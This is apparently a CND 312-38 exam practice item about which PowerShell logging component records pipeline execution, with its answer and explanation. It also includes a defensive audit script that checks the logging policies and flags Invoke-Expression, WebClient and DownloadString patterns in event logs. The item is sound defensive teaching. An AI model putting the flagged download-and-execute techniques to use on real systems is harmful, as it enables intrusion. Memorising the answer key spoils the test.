CND (312-38) Network Defense Simulation
Network Scenario
You are a Blue Team Defender managing endpoint telemetry for an MNC. Recent threat intelligence reports an increase in fileless malware attacks utilizing obfuscated PowerShell commands. The SOC requires deep visibility into dynamically generated scripts and in-memory execution. You are currently reviewing the Group Policy Objects (GPOs) applied to the Windows endpoints to ensure the SIEM receives the necessary execution steps and variable states.
Traffic & Logs
TELEMETRY REVIEW: The SIEM is successfully capturing Event ID 4103, which exposes the specific commands and variables dynamically processed by the PowerShell engine, bypassing static obfuscation.
Question
Albert works as a Windows system administrator at an MNC. He uses PowerShell logging to identify any suspicious scripting activity across the network. He wants to record pipeline execution details as PowerShell executes, including variable initialization and command invocations. Which PowerShell logging component records pipeline execution details as PowerShell executes?
Expert Analysis
Endpoints are executing PowerShell scripts, potentially malicious ones that use "Living-off-the-Land" (LotL) techniques. To detect these, the defender is configuring advanced endpoint telemetry to forward detailed PowerShell engine events to a centralized SIEM for behavioral analysis.
2. Identify attack or behavior:
Attackers often obfuscate their scripts (e.g., base64 encoding or string manipulation) to evade static antivirus signatures. When the script runs, the PowerShell engine must deobfuscate it to execute. Capturing pipeline execution and variable state catches the payload at its most vulnerable point: during execution.
3. Why correct answer (A) is correct:
- Module logging (Event ID 4103): This specific logging feature records pipeline execution details as PowerShell executes. It logs variable initializations, command invocations, and portions of scripts, providing a granular view of what the script is dynamically doing step-by-step.
4. Why others are wrong:
- Script block logging (Event ID 4104): While essential, it records the *entire content* of script blocks as they are executed, not the step-by-step pipeline execution or variable state. It's best for capturing the deobfuscated code block, but Module logging captures the operational flow.
- Transcript logging: Records the input and output (I/O) of a PowerShell session, identical to what a user sees on the screen. It misses background pipeline variables not sent to the console.
- Event logging: A generic term representing standard application/system logs, not a specific, granular PowerShell defensive control.
5. Defensive action:
Ensure both "Turn on PowerShell Script Block Logging" and "Turn on PowerShell Module Logging" are enabled via Active Directory Group Policy. Ensure the logs are properly sized to avoid rollover and ingested into a SIEM for alerting on suspicious cmdlets like Invoke-Expression (IEX) or System.Net.WebClient.
For robust defense-in-depth on Windows endpoints, enable all three core PowerShell logging types:
1. Module Logging (EID 4103): Records pipeline execution, command invocations, and variable states. Great for dynamic analysis.
2. Script Block Logging (EID 4104): Captures the full code of the script block. Defeats static obfuscation as code is logged right before the engine processes it.
3. Transcription Logging: Creates a text file of all terminal input and output. Great for forensic reconstruction of interactive threat actor sessions.
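As an added example (not part of the CND course material), here is a PowerShell audit script a defender could run on an endpoint: it checks the registry values those three GPO settings write to, warns if module logging is not scoped to all modules, and triages the last day of 4103/4104 events for the cmdlets named above. The suspicious-pattern list is an illustrative assumption, not a vendor signature set.

```powershell
# Added example, not from the CND material. Audits the three PowerShell logging
# policies and triages 4103/4104 events. Run as an administrator on a Windows endpoint.
$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Each GPO setting writes a DWORD under this policy root when enabled.
$checks = @(
    @{ Name = 'Turn on PowerShell Module Logging';       Key = "$policyRoot\ModuleLogging";      Value = 'EnableModuleLogging' }
    @{ Name = 'Turn on PowerShell Script Block Logging'; Key = "$policyRoot\ScriptBlockLogging"; Value = 'EnableScriptBlockLogging' }
    @{ Name = 'Turn on PowerShell Transcription';        Key = "$policyRoot\Transcription";      Value = 'EnableTranscripting' }
)

function Get-PowerShellLoggingStatus {
    foreach ($c in $checks) {
        $enabled = $false
        if (Test-Path $c.Key) {
            $enabled = (Get-ItemProperty -Path $c.Key -Name $c.Value -ErrorAction SilentlyContinue).($c.Value) -eq 1
        }
        [pscustomobject]@{ Setting = $c.Name; Enabled = $enabled }
    }
}

Get-PowerShellLoggingStatus | Format-Table -AutoSize

# Module logging (4103) only covers modules listed under ModuleNames; '*' means all.
$moduleNames = Get-ItemProperty -Path "$policyRoot\ModuleLogging\ModuleNames" -ErrorAction SilentlyContinue
if (-not $moduleNames -or -not $moduleNames.PSObject.Properties['*']) {
    Write-Warning "ModuleNames has no '*' entry; pipeline details for most modules will not be logged."
}

# Triage: pull the last 24h of 4103 (pipeline) and 4104 (script block) events and
# flag the download-and-execute patterns the analysis calls out (assumed list).
$suspicious = 'Invoke-Expression', '\bIEX\b', 'System\.Net\.WebClient', 'DownloadString', '-EncodedCommand'

$filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4103, 4104; StartTime = (Get-Date).AddHours(-24) }
Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    Where-Object { $msg = $_.Message; $suspicious | Where-Object { $msg -match $_ } } |
    Select-Object TimeCreated, Id, @{ n = 'Snippet'; e = {
        $m = ($_.Message -replace '\s+', ' ')
        $m.Substring(0, [Math]::Min(160, $m.Length))
    } } |
    Format-Table -Wrap
```

If the Operational log is missing or empty, the query returns nothing rather than erroring; confirm the channel is enabled and sized before trusting a clean result.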